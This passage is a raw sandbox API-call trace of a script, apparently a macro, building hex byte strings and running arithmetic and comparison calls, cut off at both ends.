pvarResult=0x197a24) returned 0x0 [0105.940] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.940] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.941] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.941] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.941] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.941] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.941] VarBstrCat (in: bstrLeft="&H8", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.941] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.941] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.941] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.941] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.941] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.941] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.941] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.941] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.941] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.942] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.942] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.942] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.942] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.942] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.942] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.942] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.942] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.942] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.942] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.942] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.942] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.942] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.942] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.942] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.943] VarBstrCat (in: bstrLeft="&H0", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.943] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.943] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.943] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.943] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.943] VarBstrCat (in: bstrLeft="&H2", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.943] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.943] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.943] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.943] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.943] VarBstrCat (in: bstrLeft="&Ha", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.943] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.943] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.943] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.944] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.944] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.944] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.944] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.944] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.944] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.944] VarBstrCat (in: bstrLeft="&Ha", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.944] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.944] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.944] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.944] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.944] VarBstrCat (in: bstrLeft="&Ha", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.944] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.944] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.944] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.945] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.945] VarBstrCat (in: bstrLeft="&Ha", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.945] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.945] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.945] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.945] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.945] VarBstrCat (in: bstrLeft="&Ha", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.945] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.945] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.945] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.945] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.945] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.945] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.945] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.945] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.946] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.946] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.946] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.946] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.946] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.947] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.948] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.949] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.950] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.951] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.952] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.953] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.955] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, 